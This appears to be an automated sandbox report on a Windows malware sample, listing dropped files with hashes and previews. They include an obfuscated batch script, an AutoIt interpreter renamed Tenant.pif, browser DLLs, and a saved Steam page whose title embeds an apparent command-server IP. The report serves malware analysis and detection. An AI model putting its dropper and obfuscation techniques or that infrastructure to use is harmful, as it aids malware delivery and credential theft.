                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):65536
                                                                                      Entropy (8bit):1.3099755344617887
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:cL7qv9JbW0BU/gjKhU44IZr8xrdzuiFBZ24IO8cC7:c6v9Jb9BU/gjVrdzuiFBY4IO8h7
                                                                                      MD5:452F1E82958D96EA78C482146D90ED4B
                                                                                      SHA1:6B9831C51686C6162EC0FA97301041BB11DA3E27
                                                                                      SHA-256:9DD938CFC8C0BBECEF580F1F3BB1FC5746C8A177EB03D9E8A177DAD0B99D7AB9
                                                                                      SHA-512:E178E053BDC98A35BB5F9BE54A296709C00AFA0249DEF3F884B9AEA05B83F17D44A7274A04BEB12A6092975FEA06F65125A8D4C1B561F9C1B64A21288690459F
                                                                                      Malicious:false
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.3.1.0.0.3.2.4.9.9.7.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.3.1.0.0.4.4.3.7.4.7.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.4.6.4.c.9.d.-.2.1.3.e.-.4.9.3.3.-.a.3.7.8.-.e.a.f.2.2.e.7.b.9.8.2.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.1.e.4.1.8.b.8.-.a.6.9.5.-.4.1.5.5.-.9.9.2.c.-.b.8.a.a.c.b.6.5.c.3.0.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.e.n.a.n.t...p.i.f.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.u.t.o.I.t.3...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.4.-.0.0.0.1.-.0.0.1.4.-.0.c.c.d.-.0.a.d.2.4.3.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.a.7.3.a.d.4.5.6.4.7.3.1.f.5.2.1.6.1.5.f.0.f.8.8.5.7.d.f.f.f.0.0.0.0.0.9.0.8.!.0.0.0.0.1.b.d.5.c.a.2.9.f.c.3.5.f.c.8.a.c.3.4.6.f.2.3.b.1.5.5.3.3.7.c.5.b.2.8.b.b.c.3.6.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Aug 29 18:50:03 2024, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):324407
                                                                                      Entropy (8bit):1.4835486362612182
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:NeOgQf6l/m6782p/wGwXh09y2zcbBSP8OX8ZeKQmQ5grqcjxzGXTuL5zMAV7US6i:NaQf9+8Bo83wKjQhA6SLpHV
                                                                                      MD5:4897CD48BA711F0372FC1CAAC670A63D
                                                                                      SHA1:8CA298F32A0DEDB131882D548EC557A74E0D26D4
                                                                                      SHA-256:E33A7CB624182AB77F7839B9E9088B63F81C4E3AF727BA20AD5857C6CAA8446B
                                                                                      SHA-512:5C7DAB481E0C600AA07D7018AD5F441371F469A386701C8C51E18C898FC7CE414FCC8B2748653BF5BA0B3D5F27E5BFBC14DF85877FEB6A353E7173DEC4C25E99
                                                                                      Malicious:false
                                                                                      Preview:MDMP..a..... ..........f.........................*..........$...Xc..........T.......8...........T................s...........3...........5..............................................................................eJ......@6......GenuineIntel............T..............f9...<........................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6332
                                                                                      Entropy (8bit):3.7218352382295605
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:R6l7wVeJEP6I2bBYOaKoprt89bVGsfA/Hm:R6lXJM6I2bBYOaKHVlft
                                                                                      MD5:338F03447A6ED8CCB9E36930E052F602
                                                                                      SHA1:E15515209C4A4173449F149CEC5E833B16C67159
                                                                                      SHA-256:7CC65EE74CC43F05C5D08B6B8BB523A5962FA5F4EEBF35549FA01F44A0FC6CD0
                                                                                      SHA-512:4CCA20820DB31A4B50DE1B6757D1C8F9FF30F432EDC8C81F09C8EDC1E618CB2ABAC2455F5E5F9C8329F943BE6B24045090F701D9BAAF72B2D137D8AAC4F289F3
                                                                                      Malicious:false
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.2.6.0.<./.P.i.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4637
                                                                                      Entropy (8bit):4.45308359401312
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwWl8zsfJg77aI9puWpW8VYIYm8M4JHCWF7v+q8p0AH8L9gd:uIjfBI7LP7VoJH9vBE8L9gd
                                                                                      MD5:3B15535AF1F1A401CF64F3490AF545B3
                                                                                      SHA1:28187D753CDAA23E7619D9BF27898F55E9AB16C6
                                                                                      SHA-256:09469B69A01EF3478F89F4318A9993A2EE4BA83028B39A3C20228C3CFEB2491D
                                                                                      SHA-512:DD288FACA7618319FFBD3801FE2950F9D34A56086A3FD099038BBF6BB88B15E785CF918CDA483976601DCE78AA9AED89420707D5F3D1EF41DA205292CD9BC0D1
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477232" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):685392
                                                                                      Entropy (8bit):6.872871740790978
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: eSLlhErJ0q.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):608080
                                                                                      Entropy (8bit):6.833616094889818
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: eSLlhErJ0q.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      • Filename: file.exe, Detection: malicious
                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):450024
                                                                                      Entropy (8bit):6.673992339875127
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2046288
                                                                                      Entropy (8bit):6.787733948558952
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):257872
                                                                                      Entropy (8bit):6.727482641240852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):80880
                                                                                      Entropy (8bit):6.920480786566406
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):34735
                                                                                      Entropy (8bit):5.401640191799369
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:Kdpqme0Ih3tAA6WGOmfcDAVTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2SV:Kd8me0Ih3tAA6WGOmFVTBv++nIjBtPF0
                                                                                      MD5:1E275841D1F3F976D238120D3C6573B6
                                                                                      SHA1:6E5D12302A22CB2233C0208EB88E91478CD2268A
                                                                                      SHA-256:BF3140C9E21F95F968BF1DD37590B17BAAE90F5D3914F4AFBC405BFC4AD7A577
                                                                                      SHA-512:0DB7DC4AFED49F3A729E7DC20E77B53B995FB5E3304D5C2D25E3755EE802922B228C128D6746DB0A16C145A151CB1151928D8B628DEEB992CDB6C49F5AD7437B
                                                                                      Malicious:false
                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: b@b# https://94.130.188.148|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hr
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):398761
                                                                                      Entropy (8bit):7.999500218021244
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:Wq3Adi8DXPNeoCeU0e/hAxo6y3hg9IQLYJP9omGa4WHy3EHt9bqEj7LOwi3FlJ+B:+iCarZ3+ZoPl1t9RtifJ+8zdE
                                                                                      MD5:CEE1D057C452C0FACA15F31F6F7EA059
                                                                                      SHA1:8EA58F31AE25E2835C5731750604416F877662A0
                                                                                      SHA-256:B9764FDFB5BA661B68600D24BC29D02F5538C5A1FC6382F1F47D6B4CA16A8DF2
                                                                                      SHA-512:67C788F82E4EDE0926F2F63FB5FC1F41DF36B37C30A22024464249C7B04F4F5651E40FA1E551661AB8ABAAFC72B689186D181D66EF63214D646FDABDC55E8D6E
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):893608
                                                                                      Entropy (8bit):6.62028134425878
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                      MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                      SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                      SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                      SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:ASCII text, with very long lines (860), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):19107
                                                                                      Entropy (8bit):5.059623981738961
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:7GMMJ+hxOkUeE0sE8o1AmYo1XVDE8yn8rxQTW3RmwbaUXaPR7Yw0f+2UX6W3NsCI:7GMuXrBRE8o1ACXpcnkzwPSwhi/mnfo
                                                                                      MD5:76823B92D15182B6DF0178DB960FC102
                                                                                      SHA1:419AFA2A867EE692F81F787552174CC0E29AE9C1
                                                                                      SHA-256:6A9CB5B829BAD93ED637D8659602F875F6D4CD2F9B1B1B55FAFA54591ADF49BC
                                                                                      SHA-512:12B2E6A748F67401BF025A30A0EF669CBD48BAA3AC5155B283640338D8FB59E6B907E28A49B8113AC7E0808960E6CE57395EF7FD38D6BAAE1174E52D6264967B
                                                                                      Malicious:false
                                                                                      Preview:Set Illustrated=M..RmAInclusion Www Tours Ev ..vTYECoastal Poker Hack Home Daughter Growth ..yIHRim Shoes Naughty Cove Shark Neural Buf ..EqChemicals Burner Jessica ..akNested Motorcycle Dome Mariah Qui Terrorist ..ytAssumes Summit ..QTJJExcerpt Blank ..Set Argentina=1..UZEVDrunk Validity Comparable Ambien Future ..rrcBhutan Propecia ..KAAccompanying Rec Ed Houses Eagles Indonesia Sells Sunny Apple ..BNFucked Merely Cabin Warehouse Multimedia Somewhere Chapters Ak ..mlShine Devon Intense Belly Ocean Wr Flush ..SUEnjoying Kitchen Deep ..idZjEnable ..eIRefined Locate Supervisors Flexibility Temperatures While Decimal Big Poet ..lsOCaused Coalition If Warranty ..Set Ist=d..naqqAnnounced Dh Compliance Inspired Milf Contamination Sensitivity ..TnWhale Wage Trauma Africa Core ..NGQCBleeding Specials Subscriber Draft Mostly Forests ..hpFlags Comes Unnecessary Wins Tongue Creations Topic Yoga ..ICJInterested Accessory Measurements Duties Obligations Permissions Murphy ..pomFixed Neighbors ..Se
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:ASCII text, with very long lines (860), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):19107
                                                                                      Entropy (8bit):5.059623981738961
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:7GMMJ+hxOkUeE0sE8o1AmYo1XVDE8yn8rxQTW3RmwbaUXaPR7Yw0f+2UX6W3NsCI:7GMuXrBRE8o1ACXpcnkzwPSwhi/mnfo
                                                                                      MD5:76823B92D15182B6DF0178DB960FC102
                                                                                      SHA1:419AFA2A867EE692F81F787552174CC0E29AE9C1
                                                                                      SHA-256:6A9CB5B829BAD93ED637D8659602F875F6D4CD2F9B1B1B55FAFA54591ADF49BC
                                                                                      SHA-512:12B2E6A748F67401BF025A30A0EF669CBD48BAA3AC5155B283640338D8FB59E6B907E28A49B8113AC7E0808960E6CE57395EF7FD38D6BAAE1174E52D6264967B
                                                                                      Malicious:false
                                                                                      Preview:Set Illustrated=M..RmAInclusion Www Tours Ev ..vTYECoastal Poker Hack Home Daughter Growth ..yIHRim Shoes Naughty Cove Shark Neural Buf ..EqChemicals Burner Jessica ..akNested Motorcycle Dome Mariah Qui Terrorist ..ytAssumes Summit ..QTJJExcerpt Blank ..Set Argentina=1..UZEVDrunk Validity Comparable Ambien Future ..rrcBhutan Propecia ..KAAccompanying Rec Ed Houses Eagles Indonesia Sells Sunny Apple ..BNFucked Merely Cabin Warehouse Multimedia Somewhere Chapters Ak ..mlShine Devon Intense Belly Ocean Wr Flush ..SUEnjoying Kitchen Deep ..idZjEnable ..eIRefined Locate Supervisors Flexibility Temperatures While Decimal Big Poet ..lsOCaused Coalition If Warranty ..Set Ist=d..naqqAnnounced Dh Compliance Inspired Milf Contamination Sensitivity ..TnWhale Wage Trauma Africa Core ..NGQCBleeding Specials Subscriber Draft Mostly Forests ..hpFlags Comes Unnecessary Wins Tongue Creations Topic Yoga ..ICJInterested Accessory Measurements Duties Obligations Permissions Murphy ..pomFixed Neighbors ..Se
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):53248
                                                                                      Entropy (8bit):7.9962856544396965
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:+bm5jMZrmDdpl5g2tT0n4KrxJGCzc7I37JPAKhD:Um54APK4o637aZ3hD
                                                                                      MD5:C6C6FE2E474E578653C09B030907E565
                                                                                      SHA1:8698F666180B9F631C366AC8DB18F32B368979C4
                                                                                      SHA-256:DB6287FCBAB462DFFD250BE2A27A75F49248C0428537A24125801A80F136669D
                                                                                      SHA-512:4FD27F6AF4A25FD382466EC3A7975D6F50208D6F6D662CA011BAE175E4BF77C74E901E754993A1EA52E0FF94A48169FAC441961F877D5C37918F94A67737850D
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):71680
                                                                                      Entropy (8bit):7.997108429898175
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:Jh79hPC9eMVup3EoWB7LAzTQoss5nwWFlMj6t+zPp:p9C9bqEj7LOwi3FlJ+7p
                                                                                      MD5:AC4E1FBAF6EB5121395B540E66B38A99
                                                                                      SHA1:D2C2BB7F854864E2FFBFBE4CCA0EBD94BA28E39A
                                                                                      SHA-256:C747FEC5DA91AF3C73F0F3FFEC58882F22E66CC8C31D1533E06EBA2E88A1AB9E
                                                                                      SHA-512:1CDAFC7F4218A3EB607D51B28AABD887AC76CDA8E4AC5CFA0034F3B0B89E570D2A99FB46E5E10B6463E156C0C430AF41ABF98D1101EF8CC66EDA545C21343128
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):86016
                                                                                      Entropy (8bit):7.998265686160575
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:nSuCFZe2jb1DgtQU6madYJshURG0tcni2EMBRqjZeSKRaJ6WVZUqMBQ4Vau4Useh:SpbjtIQBdYJP9t/2hmiRa4WVZJMm4EHW
                                                                                      MD5:1907385FF9BC97C2FFDE248BD913FFB2
                                                                                      SHA1:01E8B5D3831AEDD4DE6DB3242B22B5B62A588E52
